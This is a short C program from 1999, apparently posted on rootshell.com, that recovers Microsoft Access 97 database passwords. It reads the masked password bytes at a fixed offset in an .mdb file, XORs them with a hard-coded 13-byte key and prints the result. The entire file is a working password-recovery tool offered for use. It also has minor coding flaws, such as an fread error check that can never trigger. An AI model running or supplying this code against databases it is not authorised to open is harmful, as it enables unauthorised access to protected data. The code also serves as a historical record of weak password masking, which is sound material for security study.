/* [ http://www.rootshell.com/ ] */

/*
 * "Decrypt" Microsoft Access 97 Database Passwords
 *
 * Nate Lawson <nate@root.org>
 * 2/9/99
 *
 * XOR sequence taken from a post by Adam Shosthack <adam@homeport.org>
 * Access 97 actually allows a user to enter a 14 char password, although
 * only the first 13 chars are stored and verified.
 */

#ifdef WIN32
#include <windows.h>
#endif
#include <stdio.h>

main (int ac, char *av[])
{
    FILE *fp;
    int i;
    unsigned char passBuf[14], xorString[] = { 0x86, 0xFB, 0xEC, 0x37,
        0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13 };

    if (ac != 2) {
        fprintf(stderr, "Usage: %s filename.mdb\n", av[0]);
        exit(1);
    }

    /* Open file, read password into buffer */
    if ((fp = fopen(av[1], "rb")) == NULL) {
        fprintf(stderr, "Unable to open %s\n", av[1]);
        exit(1);
    }
    if ((fseek(fp, 0x42, SEEK_SET)) < 0) {
        fprintf(stderr, "Unable to seek.  File truncated?\n");
        exit(1);
    }
    if ((fread(passBuf, sizeof(passBuf) - 1, 1, fp)) < 0) {
        fprintf(stderr, "Cannot read file: %s\n", av[1]);
        exit(1);
    }

    /* Unmask password and print out results */
    for (i = 0; i < sizeof(passBuf) - 1; i++)
        passBuf[i] ^= xorString[i];
    passBuf[sizeof(passBuf) - 1] = '\0';

    printf("Password is:\n   %s (ascii)\n   ", passBuf);
    for (i = 0; i < sizeof(passBuf) - 1; i++)
        printf("0x%x ", passBuf[i]);
    printf("(hex)\n");

    exit(0);
}